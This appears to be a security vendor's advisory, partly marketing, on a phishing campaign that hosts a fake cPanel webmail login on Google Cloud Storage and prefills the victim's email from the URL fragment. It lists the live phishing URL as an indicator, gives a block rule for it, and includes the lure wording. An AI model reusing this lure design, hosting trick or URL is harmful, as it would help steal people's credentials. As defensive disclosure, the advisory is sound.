Google Cloud Storage Weaponized for cPanel Credential Harvesting

The CADMUS threat intelligence team has tracked an escalating phishing vector that sidesteps standard gateway filters by abusing public cloud objects. This technical advisory details the inner workings of a cPanel-themed credential harvesting ring actively exploiting Google Cloud Storage infrastructure.

The Anatomy of the Attack

Phase 1: Header Spoofing and Urgency Injection

The attack starts with a highly targeted message delivered via a layout built to mirror cPanel L.L.C.’s internal template designs.

• Subject Vector: Please Confirm To Continue
• From Envelope: Spoofed to match the recipient's organization domain (no-reply@company.com).
• The Bait: The payload claims an account status change requires dynamic revalidation to prevent total loss of company web files and mail flow.

Phase 2: Domain Reputation Evasion

The structural core of this attack relies on abusing trusted public clouds. The embedded CTA points directly to a page layout hosted on a Google storage infrastructure bucket:

https://storage.googleapis.com/binremgroups.com/cPweb86.html#user@company.com

Because storage.googleapis.com is an enterprise domain widely whitelisted for legitimate cloud application usage, conventional security layers struggle to flag it without deep, signature-based content scanning engines.

Gateway Evaluation Flow:

• Inbound Mail Gateway Assessment
  • Condition: Link points to a known malicious-domain.com? → [ BLOCK ]
  • Condition: Link points to trusted storage.googleapis.com? → [ ALLOW / BYPASS ]
    • Downstream Consequence: Security perimeter breached → (Malicious Payload Delivered)

Phase 3: Client-Side DOM Manipulation

Upon analyzing the payload file (cPweb86.html), our laboratory identified several open-source frontend components, including Bootstrap UI, jQuery, and SweetAlert.

The page utilizes a URL fragment identifier (the string following the # symbol). JavaScript parses the window location parameters when the victim lands on the page:

1. It extracts the client's email address directly from the # anchor.
2. It manipulates the DOM to dynamically populate the user form field.
3. It presents a pixel-perfect imitation of a standard Webmail login layout.

Any password entered into this form is exfiltrated to a backend server managed by the threat actors.

Technical Profile & Indicators of Compromise

• Target URL: https://storage.googleapis.com/binremgroups.com/cPweb86.html
• Resolved Threat IP: 142.250.190.251 (Google LLC Autonomous System)
• Classification: Credential Harvester / Phishing Landing Page
• Detected Framework Footprints: Bootstrap UI, SweetAlert JavaScript Alert engine, jQuery

How MailShield Neutralizes This Vector

Traditional security gateways fail here because they rely too heavily on the static reputation of the top-level domain (storage.googleapis.com).

MailShield stops this campaign using a layered approach:

• Heuristic Object Analysis: Rather than just scanning the domain name, MailShield inspects path components and queries files for client-side manipulation hooks (such as location hash mapping scripts).
• Outbound Threat Context Mapping: MailShield matches forged metadata values against transactional sending patterns to flag anomalies before delivery.

Defenses & Mitigations

If you are not yet running MailShield perimeter defense, we advise enforcing the following system boundaries:

1. URL Filtering Rules: Create an explicit infrastructure block rule targeting strings containing storage.googleapis.com/binremgroups.com/.
2. Strict SPF/DMARC Enforcement: Implement p=reject or p=quarantine handling to block messages that attempt to spoof your own domain layout internally.
3. Session Revocation: If any staff member interacted with this link, immediately terminate all active sessions for that user profile and trigger an administrative password reset.